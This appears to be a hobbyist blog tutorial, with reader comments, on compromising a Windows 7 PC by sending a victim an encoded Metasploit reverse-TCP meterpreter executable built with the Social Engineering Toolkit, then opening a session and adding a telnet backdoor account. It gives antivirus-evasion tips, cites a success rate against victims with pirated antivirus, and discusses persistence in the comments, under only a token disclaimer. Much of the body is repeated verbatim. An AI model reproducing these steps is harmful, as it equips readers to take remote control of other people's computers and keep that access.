hello guys, today iam gonna show you how to 'hack' into a windows 7 pc using 'metasploit' as well as 'SET'(social engineering toolkit).You can follow the images for easy reference...being this my 1st post!!
As u can see above,you can launch SET by going to applications>>backtrack>>exploitation tools>>social engineering toolkit>>SET
Then, select option 1-social engineering attacks.
We are going to infect our victim with a 'EXECUTABLE PAYLOAD'.It is the best way to attack if you keep your metasploit framework updated.If your framework is not updated, you can run the following command in a terminal-
"msfupdate"
Type this command without quotes.It may take a long time before it gets updated completely, if you are in a hurry then continue without updating.There is a drawback though, if you did not update, the executable file may get detectable by AV's.(my own experience)
Now to be with the topic,
Select the option 4- create a payload and a listener.
If you are with me, you are good to go--
Now you see, it asks for your IP,open a new terminal and type-
"ifconfig"
Type without quotes.There, depending on your connections there may be some interface names such as=eth0,wlan0 etc..if you are using WiFi connection, (remember to port forward your router for inbound and outbound connections) it is represented as wlan0 and for one who is behind a network,it should be eth0 i guess.Below your respective interfaces you can see "inet-address" followed by a number which is your IP.Just copy paste that number into your SET when it prompts for one.Now get going--
There you go, i entered mine:192.168.56.101 (behind a network)
Now it asks for your payload. For windows target it is always "windows shell reverse tcp or windows reverse tcp meterpreter" i opt number 2 as it is a great tool and better to use than the 1st one.(trust me, the 1st one works but it is damn complicated!!!!!!)This tool called meterpreter is a really powerful tool which can perform many things like: key logging,screen capturing,uploading-downloading files and almost anything!!
look at the pic above; It is the encoding menu where you can select the encoding for your executable file.I recommend option '16' as it is widely used and it is also ranked BEST.Encoding is nothing but a way of coding the file which makes it undetectable by AV's but unfortunately updated antiviruses catch hold of such encoded files also.But as far as i know, most people download anti-viruses from torrents or Google and end up getting counterfeit copies which cannot update itself.So its a 70% success rate that we have.Wait untill the process of encoding completes...
Process completed and you can see the directory of our exe file (i have highlighted it in the image>>).The exe file,is at default named 'msf.exe'.You can find the file in the directory-- file system>>pentest>>exploits>>set>>msf.exe.It is this file that you have to send to the victim or target and then start the listener by typing 'yes' when it asks for yes or no.(look at the image above)
Here in the image is the directory and the msf.exe backdoor.Go on reading....
Yes, the listener is online and listening on port 443.look at picture below>>>>
Our poor and unsuspecting target is launching our backdoor...
Hey wait a minute, our listener has caught something interesting.....guess what??? METERPRETER SESSION 1 OPENED!!! that's it we have successfully compromised the targets pc!Type the following command to see active sessions-
"sessions -i"
The active session id for me is 1.To interact with 1, type--
"sessions -i 1"
You are in the meterpreter command line now!!! you can type--
"help"
to get the meterpreter commands.I typed "sysinfo" to show that an actual windows 7 pc has been compromised :D!!
But if the victim pc reboots or shuts down his/her pc, you have to follow the whole process again..you would'nt like that right?Then type--
"run gettelnet -u [any username] -p [any password]
See the image below>> i have set jack as a user in victim pc and the password is also jack.This opens port 23 ready for connection and when you telnet thr victim (open a terminal and type "open [victim ip] 23") it asks for a username and password.Then type jack in both fields and you are in again!!!(with little features)
ENJOY!!! I will soon be posting articles on meterpreter command and other flaws...
COUNTER-MEASURE:
1) Install a third party firewall.
2)Never accept any file simply without scanning.
NOTE:I do not in anyway support cyber crime and be held in anyway responsible for how the readers use the info.As you can see i have worked out in my own lab (LAN).I request the readers to not use this for hacking into confidential computers and causing havoc.CONNECTING TO OTHER COMPUTERS CREATE LOG FILES IN THE REMOTE PC/SERVER DEPENDING ON THE COMMAND YOU EXECUTED.AN EXPERT MAY BE ABLE TO ACCESS THOSE FILES AND REPORT THE IP LOG TO THE RESPECTIVE ISP AND FINALLY PARKING YOU BEHIND THE BARS--
TAGS:hacking,windows .hack,windows,backdoor, windows 7 hack,metasploit, backtrack hacking,
backdoor,telnet,gamez&geeks,10526,hacking,windows hack,windows flaws....
As u can see above,you can launch SET by going to applications>>backtrack>>exploitation tools>>social engineering toolkit>>SET
Then, select option 1-social engineering attacks.
We are going to infect our victim with a 'EXECUTABLE PAYLOAD'.It is the best way to attack if you keep your metasploit framework updated.If your framework is not updated, you can run the following command in a terminal-
"msfupdate"
Type this command without quotes.It may take a long time before it gets updated completely, if you are in a hurry then continue without updating.There is a drawback though, if you did not update, the executable file may get detectable by AV's.(my own experience)
Now to be with the topic,
Select the option 4- create a payload and a listener.
If you are with me, you are good to go--
Now you see, it asks for your IP,open a new terminal and type-
"ifconfig"
Now it asks for your payload. For windows target it is always "windows shell reverse tcp or windows reverse tcp meterpreter" i opt number 2 as it is a great tool and better to use than the 1st one.(trust me, the 1st one works but it is damn complicated!!!!!!)This tool called meterpreter is a really powerful tool which can perform many things like: key logging,screen capturing,uploading-downloading files and almost anything!!
Process completed and you can see the directory of our exe file (i have highlighted it in the image>>).The exe file,is at default named 'msf.exe'.You can find the file in the directory-- file system>>pentest>>exploits>>set>>msf.exe.It is this file that you have to send to the victim or target and then start the listener by typing 'yes' when it asks for yes or no.(look at the image above)
Here in the image is the directory and the msf.exe backdoor.Go on reading....
Yes, the listener is online and listening on port 443.look at picture below>>>>
Our poor and unsuspecting target is launching our backdoor...
Hey wait a minute, our listener has caught something interesting.....guess what??? METERPRETER SESSION 1 OPENED!!! that's it we have successfully compromised the targets pc!Type the following command to see active sessions-
"sessions -i"
The active session id for me is 1.To interact with 1, type--
"sessions -i 1"
You are in the meterpreter command line now!!! you can type--
"help"
to get the meterpreter commands.I typed "sysinfo" to show that an actual windows 7 pc has been compromised :D!!
But if the victim pc reboots or shuts down his/her pc, you have to follow the whole process again..you would'nt like that right?Then type--
"run gettelnet -u [any username] -p [any password]
See the image below>> i have set jack as a user in victim pc and the password is also jack.This opens port 23 ready for connection and when you telnet thr victim (open a terminal and type "open [victim ip] 23") it asks for a username and password.Then type jack in both fields and you are in again!!!(with little features)
ENJOY!!! I will soon be posting articles on meterpreter command and other flaws...
COUNTER-MEASURE:
1) Install a third party firewall.
2)Never accept any file simply without scanning.
NOTE:I do not in anyway support cyber crime and be held in anyway responsible for how the readers use the info.As you can see i have worked out in my own lab (LAN).I request the readers to not use this for hacking into confidential computers and causing havoc.CONNECTING TO OTHER COMPUTERS CREATE LOG FILES IN THE REMOTE PC/SERVER DEPENDING ON THE COMMAND YOU EXECUTED.AN EXPERT MAY BE ABLE TO ACCESS THOSE FILES AND REPORT THE IP LOG TO THE RESPECTIVE ISP AND FINALLY PARKING YOU BEHIND THE BARS--
TAGS:hacking,windows .hack,windows,backdoor, windows 7 hack,metasploit, backtrack hacking,
backdoor,telnet,gamez&geeks,10526,hacking,windows hack,windows flaws....
can leave comments for ?'s
ReplyDeletewhere will the backdoor be located on the windows system??
ReplyDeleteit dosent get located....and u gotta make it permanent by adding it to autoexec.bat or some registry tricks...
DeleteI can't login to the meterpreter session again with the open [ip] 23
ReplyDeleteyes its terminated once u exit meterpreter....u need to configure a backdoor to stay connected ....and u juz tried to telnet him and with no telnet server available online with the victim, tat wont work...will post some articles on it....stay tuned
Deleteyeahhhh ! finally i get it :)
ReplyDeletethanks million for ur tutorial <3